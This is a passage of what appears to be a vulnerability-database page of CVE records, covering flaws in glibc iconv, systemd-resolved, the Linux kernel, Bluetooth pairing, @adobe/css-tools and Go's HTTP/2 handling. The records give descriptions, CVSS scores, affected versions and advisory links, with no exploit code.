"temporalScore": 5.3, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "Improper Input Validation (CWE-20)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-14T13:09:22.993Z", "orgId": "078d4453-3bcd-4900-85e6-15281da43538", "shortName": "adobe" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://github.com/adobe/css-tools/security/advisories/GHSA-prr3-c3m5-p7q2" } ], "source": { "discovery": "EXTERNAL" }, "title": "Denial of Service of regular expression in package @adobe/css-tools" } }, "cveMetadata": { "assignerOrgId": "078d4453-3bcd-4900-85e6-15281da43538", "assignerShortName": "adobe", "cveId": "CVE-2023-48631", "datePublished": "2023-12-14T13:09:22.993Z", "dateReserved": "2023-11-16T23:29:25.406Z", "dateUpdated": "2024-08-02T21:37:53.427Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-46862
Vulnerability from cvelistv5
Published
2023-10-29 00:00
Modified
2024-08-02 20:53
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel through 6.5.9. During a race with SQ thread exit, an io_uring/fdinfo.c io_uring_show_fdinfo NULL pointer dereference can occur.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:53:21.892Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/7644b1a1c9a7ae8ab99175989bfc8676055edb46" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.kernel.org/show_bug.cgi?id=218032#c4" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel through 6.5.9. During a race with SQ thread exit, an io_uring/fdinfo.c io_uring_show_fdinfo NULL pointer dereference can occur." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T21:06:27.982048", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/7644b1a1c9a7ae8ab99175989bfc8676055edb46" }, { "url": "https://bugzilla.kernel.org/show_bug.cgi?id=218032#c4" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3711-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-46862", "datePublished": "2023-10-29T00:00:00", "dateReserved": "2023-10-29T00:00:00", "dateUpdated": "2024-08-02T20:53:21.892Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-26555
Vulnerability from cvelistv5
Published
2021-05-24 17:41
Modified
2024-08-04 15:56
Severity ?
EPSS score ?
Summary
Bluetooth legacy BR/EDR PIN code pairing in Bluetooth Core Specification 1.0B through 5.2 may permit an unauthenticated nearby device to spoof the BD_ADDR of the peer device to complete pairing without knowledge of the PIN.
References
▼ | URL | Tags |
---|---|---|
https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/ | x_refsource_MISC | |
https://kb.cert.org/vuls/id/799380 | x_refsource_MISC | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSS6CTGE4UGTJLCOZOASDR3T3SLL6QJZ/ | vendor-advisory, x_refsource_FEDORA | |
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00520.html | x_refsource_CONFIRM |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T15:56:04.577Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://kb.cert.org/vuls/id/799380" }, { "name": "FEDORA-2021-a35b44fd9f", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSS6CTGE4UGTJLCOZOASDR3T3SLL6QJZ/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00520.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Bluetooth legacy BR/EDR PIN code pairing in Bluetooth Core Specification 1.0B through 5.2 may permit an unauthenticated nearby device to spoof the BD_ADDR of the peer device to complete pairing without knowledge of the PIN." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-06-08T17:06:22", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://kb.cert.org/vuls/id/799380" }, { "name": "FEDORA-2021-a35b44fd9f", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSS6CTGE4UGTJLCOZOASDR3T3SLL6QJZ/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00520.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-26555", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Bluetooth legacy BR/EDR PIN code pairing in Bluetooth Core Specification 1.0B through 5.2 may permit an unauthenticated nearby device to spoof the BD_ADDR of the peer device to complete pairing without knowledge of the PIN." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/", "refsource": "MISC", "url": "https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/reporting-security/" }, { "name": "https://kb.cert.org/vuls/id/799380", "refsource": "MISC", "url": "https://kb.cert.org/vuls/id/799380" }, { "name": "FEDORA-2021-a35b44fd9f", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NSS6CTGE4UGTJLCOZOASDR3T3SLL6QJZ/" }, { "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00520.html", "refsource": "CONFIRM", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00520.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-26555", "datePublished": "2021-05-24T17:41:15", "dateReserved": "2020-10-04T00:00:00", "dateUpdated": "2024-08-04T15:56:04.577Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-7008
Vulnerability from cvelistv5
Published
2023-12-23 13:00
Modified
2024-11-23 03:39
Severity ?
EPSS score ?
Summary
A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2463 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3203 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-7008 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2222261 | ||
https://bugzilla.redhat.com/show_bug.cgi?id=2222672 | issue-tracking, x_refsource_REDHAT | |
https://github.com/systemd/systemd/issues/25676 |
Impacted products
Vendor | Product | Version | |||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:239-82.el8 < * cpe:/o:redhat:enterprise_linux:8::baseos |
||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-11-22T12:04:44.733Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2463", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2463" }, { "name": "RHSA-2024:3203", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3203" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-7008" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2222261" }, { "name": "RHBZ#2222672", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2222672" }, { "tags": [ "x_transferred" ], "url": "https://github.com/systemd/systemd/issues/25676" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4GMDEG5PKONWNHOEYSUDRT6JEOISRMN2/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QHNBXGKJWISJETTTDTZKTBFIBJUOSLKL/" }, { "url": "https://security.netapp.com/advisory/ntap-20241122-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "systemd", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:239-82.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "affected", "packageName": "systemd", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:252-32.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "affected", "packageName": "systemd", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:252-32.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:cryostat:2" ], "defaultStatus": "unaffected", "packageName": "systemd", "product": "Cryostat 2", "vendor": "Red Hat" } ], "datePublic": "2022-12-08T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-300", "description": "Channel Accessible by Non-Endpoint", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T03:39:26.132Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2463", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2463" }, { "name": "RHSA-2024:3203", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3203" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-7008" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2222261" }, { "name": "RHBZ#2222672", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2222672" }, { "url": "https://github.com/systemd/systemd/issues/25676" } ], "timeline": [ { "lang": "en", "time": "2023-07-12T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2022-12-08T00:00:00+00:00", "value": "Made public." } ], "title": "Systemd-resolved: unsigned name response in signed zone is not refused when dnssec=yes", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-300: Channel Accessible by Non-Endpoint" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-7008", "datePublished": "2023-12-23T13:00:50.515Z", "dateReserved": "2023-12-20T15:28:32.966Z", "dateUpdated": "2024-11-23T03:39:26.132Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-2961
Vulnerability from cvelistv5
Published
2024-04-17 17:27
Modified
2024-11-15 15:22
Severity ?
EPSS score ?
Summary
The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The GNU C Library | glibc |
Version: 2.1.93 < 2.40 |
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "glibc", "vendor": "gnu", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.1.93", "versionType": "semver" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-2961", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-05-30T04:00:23.144191Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:29:57.648Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-11-15T15:22:29.055Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "url": "https://www.ambionics.io/blog/iconv-cve-2024-2961-p1" }, { "url": "https://www.ambionics.io/blog/iconv-cve-2024-2961-p2" }, { "url": "https://www.ambionics.io/blog/iconv-cve-2024-2961-p3" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0004" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P3I4KYS6EU6S7QZ47WFNTPVAHFIUQNEL/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YAMJQI3Y6BHWV3CUTYBXOZONCUJNOB2Z/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BTJFBGHDYG5PEIFD5WSSSKSFZ2AZWC5N/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/24/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/17/9" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/18/4" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/27/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/27/6" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/27/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/27/4" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/27/5" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/05/27/3" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240531-0002/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "title": "CVE Program Container", "x_generator": { "engine": "ADPogram 0.0.1" } } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "glibc", "vendor": "The GNU C Library", "versions": [ { "lessThan": "2.40", "status": "affected", "version": "2.1.93", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Charles Fol" } ], "datePublic": "2024-04-17T17:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.\u003cbr\u003e" } ], "value": "The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.\n" } ], "impacts": [ { "capecId": "CAPEC-100", "descriptions": [ { "lang": "en", "value": "CAPEC-100 Overflow Buffers" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-17T17:51:03.169Z", "orgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "shortName": "glibc" }, "references": [ { "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0004" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P3I4KYS6EU6S7QZ47WFNTPVAHFIUQNEL/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YAMJQI3Y6BHWV3CUTYBXOZONCUJNOB2Z/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BTJFBGHDYG5PEIFD5WSSSKSFZ2AZWC5N/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/24/2" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/17/9" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/18/4" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00001.html" }, { "url": "http://www.openwall.com/lists/oss-security/2024/05/27/2" }, { "url": "http://www.openwall.com/lists/oss-security/2024/05/27/6" }, { "url": "http://www.openwall.com/lists/oss-security/2024/05/27/1" }, { "url": "http://www.openwall.com/lists/oss-security/2024/05/27/4" }, { "url": "http://www.openwall.com/lists/oss-security/2024/05/27/5" }, { "url": "http://www.openwall.com/lists/oss-security/2024/05/27/3" }, { "url": "https://security.netapp.com/advisory/ntap-20240531-0002/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "assignerShortName": "glibc", "cveId": "CVE-2024-2961", "datePublished": "2024-04-17T17:27:40.541Z", "dateReserved": "2024-03-26T19:29:31.186Z", "dateUpdated": "2024-11-15T15:22:29.055Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-25743
Vulnerability from cvelistv5
Published
Modified
2024-08-15 15:36
Severity ?
EPSS score ?
Summary
In the Linux kernel through 6.9, an untrusted hypervisor can inject virtual interrupts 0 and 14 at any point in time and can trigger the SIGFPE signal handler in userspace applications. This affects AMD SEV-SNP and AMD SEV-ES.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T23:52:05.738Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1223307" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2270836" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:o:linux:kernel:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "kernel", "vendor": "linux", "versions": [ { "lessThanOrEqual": "6.9", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-25743", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-07-23T19:06:44.168868Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-15T15:36:42.796Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel through 6.9, an untrusted hypervisor can inject virtual interrupts 0 and 14 at any point in time and can trigger the SIGFPE signal handler in userspace applications. This affects AMD SEV-SNP and AMD SEV-ES." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-17T21:13:28.367115", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1223307" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2270836" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2024-25743", "dateUpdated": "2024-08-15T15:36:42.796Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-37453
Vulnerability from cvelistv5
Published
2023-07-06 00:00
Modified
2024-08-02 17:16
Severity ?
EPSS score ?
Summary
An issue was discovered in the USB subsystem in the Linux kernel through 6.4.2. There is an out-of-bounds and crash in read_descriptors in drivers/usb/core/sysfs.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:16:29.576Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://syzkaller.appspot.com/bug?extid=18996170f8096c6174d0" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/000000000000c0ffe505fe86c9ca%40google.com/T/" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/000000000000e56434059580f86e%40google.com/T/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1e4c574225cc5a0553115e5eb5787d1474db5b0f" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=85d07c55621676d47d873d2749b88f783cd4d5a1" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=de28e469da75359a2bb8cd8778b78aa64b1be1f4" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ff33299ec8bb80cdcc073ad9c506bd79bb2ed20b" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the USB subsystem in the Linux kernel through 6.4.2. There is an out-of-bounds and crash in read_descriptors in drivers/usb/core/sysfs.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:41:40.673002", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://syzkaller.appspot.com/bug?extid=18996170f8096c6174d0" }, { "url": "https://lore.kernel.org/all/000000000000c0ffe505fe86c9ca%40google.com/T/" }, { "url": "https://lore.kernel.org/all/000000000000e56434059580f86e%40google.com/T/" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=1e4c574225cc5a0553115e5eb5787d1474db5b0f" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=85d07c55621676d47d873d2749b88f783cd4d5a1" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=de28e469da75359a2bb8cd8778b78aa64b1be1f4" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ff33299ec8bb80cdcc073ad9c506bd79bb2ed20b" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-37453", "datePublished": "2023-07-06T00:00:00", "dateReserved": "2023-07-06T00:00:00", "dateUpdated": "2024-08-02T17:16:29.576Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45288
Vulnerability from cvelistv5
Published
2024-04-04 20:37
Modified
2024-08-26 20:40
Severity ?
EPSS score ?
Summary
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Go standard library | net/http |
Version: 0 ≤ Version: 1.22.0-0 ≤ |
||||
|
